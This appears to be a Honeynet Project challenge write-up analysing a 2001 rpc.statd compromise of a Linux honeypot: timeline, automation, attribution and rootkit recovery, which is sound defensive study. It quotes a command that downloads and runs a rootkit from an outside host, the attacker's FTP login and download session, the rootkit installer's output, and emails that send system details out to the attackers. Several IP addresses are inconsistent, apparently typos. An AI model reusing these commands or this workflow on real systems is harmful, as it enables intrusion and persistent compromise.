Synopsis:
On March 15, 2001 a Honeynet Project system running Redhat Linux 6.2 was compromised using a well-known vulnerability in rpc.statd. The attack was executed from a system (211.185.125.124) owned by the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. However, the intruders appear to be of Romanian nationality. It is likely that the attackers compromised the system belonging to the KPES and used it as a "jump point" to attack the honeynet system.
Virtually all aspects of the attack were automated. The intruder's automation tools were all derivatives of tools widely available on the Internet.
Systems:
Victim
|
Attacker
|
Hostname: asdf1
|
OS: Probably Redhat Linux 6.2
|
IP: 172.16.1.108
|
IP: 211.185.125.124
|
OS: Redhat Linux 6.2 (2.2.14-5.0)
|
IP allocated to the Kyongsan Purim Elementary School (KPES) in South Korea.
|
Hardware: Intel Pentium 200 MMX
|
Disk: approximately 4 GB of mounted storage
|
Chain of events:
03/15/2001 20:21:23
The KPES machine begins performing port 111 scans of the IP range 172.16.1.101 - 172.16.1.108. The only devices found to be running the portmapper are 172.16.1.103 and 192.16.1.108.
03/15/2001 20:21:24
The KPES machine sends a rpc query to 176.16.1.103 to obtain the port number for rpc.statd. The victim machine responds with rpc.statd is on port 32773.
03/15/2001 20:21:24
The KPES machine attempts the rpc.statd buffer overflow attack against 176.16.1.103. The attack fails, 176.16.1.103 which is running Solaris 7 does not appear to be vulnerable to this particular exploit (NOTE: If the .103 machines is SPARC architecture it is definitely not vulnerable to this exploit as the shellcode has been written for the x86 platform). The attacking machine discontinues its attempt to compromise the system using the rpc.statd attack.
03/15/2001 20:21:24
The KPES machine sends a rpc query to 176.16.1.108 to obtain the port number for rpc.statd. The victim machine responds with rpc.statd is on port 931.
03/15/2001 20:21:25
The KPES machine attempts the rpc.statd buffer overflow attack against 176.16.1.108. The attack is successful and binds a shell to port 39168.
03/15/2001 20:21:36
The KPES machine establishes a connection with 176.16.1.108 on port 39168 and executes the following sequence of commands:
1. cd /; uname -a; id;
2. ftp -v ftp.home.ro
USER soane
PASS i2ttgcj1d
SYST
TYPE I
PORT 172,16,1,108,4,3
RETR lk.tgz
QUIT
3. tar -zxvf lk.tgz
4. cd last
5. ./install
03/15/2001 20:45
The KPES machine closes all open connections to 176.16.1.108.
03/15/2001 20:46:15
176.16.1.108 establishes the first of two SMTP sessions with mta-v15.mail.yahoo.com (216.136.129.14, bidi_damm@yahoo.com) and outblaze.com (209.61.188.33, last@linuxmail.org) respectively. Both sessions attempt to send a message to the attackers informing them of a successful attack and relevant system information. Only the message to the yahoo account was successfully delivered. The message to the outblaze.com account failed due to the victim machine using a non-existent domain.
220 YSmtp mta502.mail.yahoo.com ESMTP service ready
EHLO asdf1
250-mta502.mail.yahoo.com
250-8BITMIME
250-SIZE 3145728
250 PIPELINING
MAIL From: SIZE=836
250 sender ok
RCPT To:
250 recipient ok
DATA
354 go ahead
Received: (from root@localhost)
by asdf1 (8.9.3/8.9.3) id TAA00952
for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600
Date: Thu, 15 Mar 2001 19:46:05 -0600
From: root
Message-Id: <200103160146.TAA00952@asdf1>
To: bidi_damm@yahoo.com
Subject: roote
* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig : inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
inet addr:172.16.1.108 Bcast:172.16.1.255 Mask:255.255.255.0
* Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id : GenuineIntel
* Cpu Model : model : 4
model name : Pentium MMX
* Cpu Speed: cpu MHz : 200.457171
* Bogomips: bogomips : 399.77
* Spatiu Liber: Filesystem Size Used Avail Use% Mounted on
/dev/hda8 251M 33M 205M 14% /
/dev/hda1 23M 2.4M 19M 11% /boot
/dev/hda6 1.6G 2.1M 1.5G 0% /home
/dev/hda5 1.6G 367M 1.2G 23% /usr
/dev/hda7 251M 5.3M 232M 2% /var
.
250 ok dirdel
QUIT
221 mta502.mail.yahoo.com
03/15/2001 20:46:23
176.16.1.108 establishes the second SMTP session with an outblaze.com (209.61.188.33) server:
220 spf2.us3.outblaze.com ESMTP Sendmail 8.11.2/8.11.2; Fri, 16 Mar 2001 01:46:24 GMT
EHLO asdf1
250-spf2.us3.outblaze.com Hello IDENT:root@asdf1.xxxxxxxxxxxxxxxxxx.xxx [172.16.1.108], pleased to meet you
250-ENHANCEDSTATUSCODES
250-EXPN
250-VERB
250-8BITMIME
250-SIZE 10000000
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
MAIL From: SIZE=838
501 5.1.8 ... Domain of sender address root@asdf1 does not exist
QUIT
221 2.0.0 spf2.us3.outblaze.com closing connection
Questions:
1. The attackers used the rpc.statd attack to get into the system. What modifications did they make to the break in process to both automate and make the process faster?
The attackers automated most aspects of the attack. Including the scanning for vulnerabilities, execution of the exploit, backdoor setup, rootkit transfer and installation, and system egress. The profile of the attack is similiar to the one provided by the luckroot exploitation package and xzibit rootkit from scan 13. The luckroot "auto rooter" package is comprised of 3 components: the luckgo script, luckscan-a rpc scanner, and luckstatdx rpc.statd exploit. The luckgo script is used to execute the luckscan-a rpc scanner against a block of addresses, if luckscan-a find a system with port 111 open it will run the luckstatdx exploit against the remote host. If the attack is successful a shell is bound to port 39168. The luckstatdx exploit then attempts to open a socket to port 39168 on the victim machine and pipe the following string to the shell:
cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n.
For the most part, this is identical to the commands executed on the honeynet system. The only differences were that FTP was used to transfer the rootkit to the victim machine and the rootkit had a different name and other minor customizations (directory name, IPs, etc). The complete reassembled session follows:
cd /; uname -a; id;
Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root)
ftp -v ftp.home.ro
Connected to ftp.home.ro.
220-
220-
220- H O M E . R O
220-
220- This server is for HOME.RO members only.
220- Go to http://www.home.ro/ to register.
220-
220- No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
soane
Name (ftp.home.ro:root): 331 Password required for soane.
Password:i2ttgcj1d
230 User soane logged in.
get lk.tgz
Remote system type is UNIX.
Using binary mode to transfer files.
local: lk.tgz remote: lk.tgz
200 PORT command successful.
150 Opening BINARY mode data connection for lk.tgz (520333 bytes).
226 Transfer complete.
bye
520333 bytes received in 35.5 secs (14 Kbytes/sec)
421 Idle Timeout (240 seconds): closing control connection.
tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
cd last
./install
********* Instalarea Rootkitului A Pornit La Drum *********
********* Mircea SUGI PULA ********************************
********* Multumiri La Toti Care M-Au Ajutat **************
********* Lemme Give You A Tip : **************************
********* Ignore everything, call your freedom ************
********* Scream & swear as much as you can ***************
********* Cuz anyway nobody will hear you and no one will *
********* Care about you **********************************
Are Make !
Are Gcc !
Nu Are Ssh !
* Inlocuim nestat ... alea alea * Gata...
* Dev...
* Gata
* Facem Director...Si Mutam Alea..
* Copiem ssh si alea
* Adaugam In Startup:) ...
* Luam Informatiile dorite ...
* Gata ! Trimitem Mailul ...Asteapta Te Rog
* Am trimis mailul ... stergem fisierele care nu mai trebuie .
* G A T A *
* That Was Nice Last
2. What system/country did the badguys come in from?
The attack was executed from a system (211.185.125.124) belonging to the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. This system appears to be a x86 based system running Redhat Linux 6.2. It is likely that the intruders compromised the KPES system using similiar techniques as those used to exploit 172.16.1.108 and used it as a "jump point" for the attack.
3. What nationality are the badguys, and how were you able to determine this?
The intruder's nationality is likely Romanian. The assumption is based on the following observations:
a. The rootkit was transferred from a Romanian FTP server, s1.home.ro (193.231.236.41) to the compromised host.
b. The rootkit installed on the compromised system has been customized to hide connection from the following 3 Romanian allocated address blocks: 192.254.34.x (logicnet.ro, ssigl.ro, sico.ro, Craiova.LogicTL.Net), 193.231.139.x (edu.ro, lgcb.ro, roedu.net), and 213.154.137.x (efesromania.pcnet.ro, fides.ro, urziceni.ro, slobozia.ro, pcnet.ro).
c. The rootkit installation script contains various comments in Romanian, the original script from the xzibit kit only contains comments in English. Therefore, it is likely that modification made to the original kit were done by native Romanian speakers.
4.What do the answers to questions #1 and #2 tell us about the tactics the badguys are using?
a. The attackers are not likely to have the ability to write their own exploits, and support tools, and are therefore mostly dependent on publically available exploits and tools.
b. The attackers tactic is to compromise as many systems as possible in as short as time as possible.
c. The attackers will use intermediate hosts as "jump points" in an efforti to obfuscate the origin of the attacks and avoid attibution.
d. The attackers will execute attacks without regard for their own operational security.
5. What did you learn from this challenge?
Retracing the attackers footstep and analyzing the automation process of the attack was interesting. Though the techniques used by the intruders are not new, it is interesting to see how techniques and tools are employed in the wild.
6.How long did this challenge take you?
Approximately 8 hours
Bonus Question:
Can you recover the blackhat's rootkit from the Snort binary log file? If so, how?
Yes, the rootkit can be retrieved by reassembling the ftp-data stream associated with the transfer of the rootkit to the compromised system. I used Ethereal to reassemble the stream and extract the rootkit from the Snort log. The rootkit contained the following files:
drwxr-xr-x 1031/users 0 2001-02-26 15:40:30 last/
-rwxr-xr-x 1031/users 611931 2002-02-08 08:08:13 last/ssh
-rw-r--r-- 1031/users 1 2001-02-26 10:29:58 last/pidfile
-rwx------ 1031/users 3713 2001-03-02 22:08:37 last/install
-rwx------ 1031/users 7165 2001-02-26 10:22:50 last/linsniffer
-rwxr-xr-x 1031/users 1345 1999-09-09 11:57:11 last/cleaner
-rw-r--r-- 1031/users 3278 2001-01-27 10:11:32 last/inetd.conf
-rwxr-xr-x 1031/users 79 2001-02-26 10:28:40 last/lsattr
-rw-r--r-- 1031/users 11407 2001-01-27 10:11:44 last/services
-rwxr-xr-x 1031/users 4060 2001-02-26 10:22:55 last/sense
-rw-r--r-- 1031/users 880 2000-10-22 15:29:44 last/ssh_config
-rw------- 1031/users 540 2000-10-22 15:29:44 last/ssh_host_key
-rw-r--r-- 1031/users 344 2000-10-22 15:29:44 last/ssh_host_key.pub
-rw------- 1031/users 512 2000-10-22 15:29:44 last/ssh_random_seed
-rw-r--r-- 1031/users 688 2001-02-26 10:29:51 last/sshd_config
-rwx------ 1031/users 8268 2001-02-26 10:22:59 last/sl2
-rwxr-xr-x 1031/users 4620 2001-02-26 10:23:10 last/last.cgi
-rwxr-xr-x 1031/users 33280 2001-02-26 10:23:33 last/ps
-rwxr-xr-x 1031/users 35300 2001-02-26 10:23:42 last/netstat
-rwxr-xr-x 1031/users 19840 2001-02-26 10:23:47 last/ifconfig
-rwxr-xr-x 1031/users 53588 2001-02-26 10:23:55 last/top
-rwx------ 1031/users 75 2001-02-26 10:24:03 last/logclear
-rw-r--r-- root/root 708 2001-03-02 22:05:12 last/s
-rwxr-xr-x 1031/users 632066 2001-02-26 09:46:04 last/mkxfs